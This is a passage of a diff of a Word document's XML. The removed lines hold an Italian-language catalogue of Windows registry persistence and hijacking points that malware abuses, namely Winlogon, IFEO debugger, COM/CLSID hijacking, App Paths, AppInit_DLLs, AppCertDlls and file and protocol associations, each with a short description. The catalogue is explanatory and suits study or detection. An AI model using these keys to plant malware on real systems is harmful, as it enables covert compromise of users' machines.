-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Winlogon</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>\Shell</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Tecnica:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Sostituisce o affianca explorer.exe.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Notify</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>CurrentVersion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Winlogon</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Notify</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Tecnica:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Carica DLL malevole in risposta a eventi di logon/logoff.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Hijacking</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Redirection</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Dirottamento</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e Reindirizzamento</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Queste sono le chiavi più "insidiose" perché non creano un nuovo processo visibile, ma modificano il comportamento di programmi legittimi.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">IFEO (Image File </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Execution</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Options):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>CurrentVersion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">\Image File </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Execution</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Options\&lt;programma.exe&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Valore:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> debugger</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Effetto:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Ogni volta che l'utente lancia quel programma, Windows lancia il payload del malware.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>C</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">lass </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>O</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">bject </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>odel</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Hijacking</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (CLSID):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>HKEY_CURRENT_USER</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>\Software\Classes\CLSID\{</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>GUID}\InprocServer32</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Tecnica:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Il malware inserisce il suo script qui. Poiché le chiavi HKCU hanno la precedenza su HKLM, Windows caricherà lo script malevolo invece della DLL di sistema originale.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="1440"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>AppPath</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Hijacking</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>CurrentVersion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">\App </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Paths</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Effetto:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Modifica il percorso degli eseguibili richiamati tramite riga di comando.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>4. Iniezione di Codice e Caricamento DLL</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Utilizzate per forzare processi legittimi a caricare codice malevolo in memoria.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="9"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>AppInit_DLLs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="9"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>CurrentVersion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>\Windows\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>AppInit_DLLs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="9"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Effetto:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Carica una DLL in ogni processo che utilizza user32.dll.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="9"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>AppCertDlls</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="9"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>HKEY_LOCAL_</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>MACHINE</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>\System\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>CurrentControlSet</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>\Control\Session Manager\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>AppCertDlls</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="9"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Effetto:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Carica</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> DLL per ogni nuovo processo creato.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">5. Protocolli e Associazioni File (Shell </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Spawning</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Queste chiavi permettono l'attivazione del malware quando l'utente compie azioni quotidiane.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>File Association: HKEY_CLASSES_ROOT\&lt;estensione&gt;\shell\open\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>command</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="10"/>
-        </w:numPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Esempio:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Modificare l'apertura dei file .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>txt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> per lanciare uno script </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> prima di aprire il </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Notepad</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="10"/>
-        </w:numPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">URL </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Protocol</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>: HKEY_CLASSES_ROOT\&lt;protocollo&gt;\shell\open\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
